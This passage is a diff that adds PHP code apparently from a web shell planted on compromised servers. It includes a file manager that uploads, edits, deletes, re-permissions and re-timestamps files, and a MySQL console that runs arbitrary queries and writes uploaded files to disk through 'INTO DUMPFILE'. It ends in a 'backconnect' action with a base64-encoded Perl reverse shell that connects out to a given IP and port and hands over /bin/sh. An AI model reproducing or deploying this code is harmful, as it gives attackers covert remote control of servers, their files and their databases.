+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Bulundugun Dizin (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+    
+	//#&#1097;+|- +-++-|+-+ |--+-+
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// -+-+--#&#1101;
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//#++&#1118;+|-+
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//-&#1073;|&#1080;- +|+&#1090;
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//-&#1073;|&#1080;#&#1101;
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//+&#1105;+&#1073;- +|+&#1090;-+-&#1074;
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//+&#1105;+&#1073;- +|+&#1090;
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
